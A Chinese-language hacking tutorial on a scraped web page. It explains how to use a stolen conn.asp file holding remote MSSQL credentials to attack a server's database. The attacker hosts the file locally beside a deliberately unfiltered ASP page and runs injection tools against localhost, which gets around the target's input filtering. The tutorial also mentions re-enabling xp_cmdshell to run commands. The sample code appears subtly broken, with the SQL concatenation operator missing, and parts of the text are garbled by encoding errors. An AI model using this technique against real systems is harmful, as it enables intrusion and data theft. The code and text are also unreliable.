主頁 > 知識(shí)庫 > 本地SQL注射攻略分析曝光

本地SQL注射攻略分析曝光

熱門標(biāo)簽:服務(wù)外包 網(wǎng)站排名優(yōu)化 呼叫中心市場(chǎng)需求 鐵路電話系統(tǒng) 地方門戶網(wǎng)站 AI電銷 Linux服務(wù)器 百度競(jìng)價(jià)排名

何為本地注射?簡(jiǎn)單地講,就是本來你在服務(wù)器上無法進(jìn)行SQL注入,因?yàn)榉?wù)器上的WEB程序很安全,對(duì)request("id")這樣的請(qǐng)求過濾很嚴(yán),或是限制輸入格式為數(shù)字等等方法,你只能選擇放棄放棄注入。

但是在有的時(shí)候,你可以在本機(jī)的IIS里進(jìn)行注入,從而達(dá)到對(duì)服務(wù)器注射的目的,避過服務(wù)器的request參數(shù)提交過濾。舉例子來說明吧,現(xiàn)在你誤打誤撞,利用暴庫或是其他的漏洞,得到了服務(wù)器的conn.asp文件,那么恭喜你,入侵離成功不遠(yuǎn)了。

conn.asp文件代碼一般如下:

%
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open "PROVIDER=SQLOLEDB;DATA SOURCE=61.121.140.37;UID=admin;pwd=12345;DATABASE=master"
%>

這里面記錄的就是服務(wù)器的數(shù)據(jù)庫的一些信息了,一般也會(huì)得到連接密碼,說明是MSSQL的系統(tǒng),非常好搞。如果服務(wù)器有URL可以進(jìn)行SQL語句注射的話,恢復(fù)下XP_CMDshell,我們就能執(zhí)行很多命令了,DOS命令也隨便你。但是很可惜,我們不能注射,只有這么一個(gè)conn.asp文件可以利用。

那么,我們?cè)诒緳C(jī)來欺騙服務(wù)器,不過你要知道那個(gè)服務(wù)器采用的是什么web程序,不然你下面就不好寫代碼,我們來寫一個(gè)sqltest.asp文件,在其中不做任何過濾,將這個(gè)文件和conn.asp一起放到你的IIS中的wwwroot下面,這樣你就能通過Localhost來訪問啦。

sqltest.asp代碼如下:

!--#include file="conn.asp"-->
%
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL ="select * from DVBBSmdb where GuestID="  id
rs.open strSQL,conn,1,3
rs.close
%>

那個(gè)DVBBSmdb是我虛構(gòu)的,大家要改成這個(gè)web程序的數(shù)據(jù)庫的庫名??吹?jīng)]有,id的提交參數(shù)沒有經(jīng)過任何的過濾,沒有用replace或是其他的函數(shù)?,F(xiàn)在我們?cè)诎中輸入注射URL:http://localhost/sqltest.asp?id=1。接著用啊D在本地服務(wù)器執(zhí)行命令或是跑用戶名和密碼,就等同于在你要入侵的服務(wù)器上進(jìn)行注射,繞過了它的防注入措施。

這就是本地欺騙注射,明白了吧?

標(biāo)簽:銅川 蘭州 湘潭 黃山 衡水 崇左 仙桃 湖南

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《本地SQL注射攻略分析曝光》,本文關(guān)鍵詞  ;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 收縮
    • 微信客服
    • 微信二維碼
    • 電話咨詢

    • 400-1100-266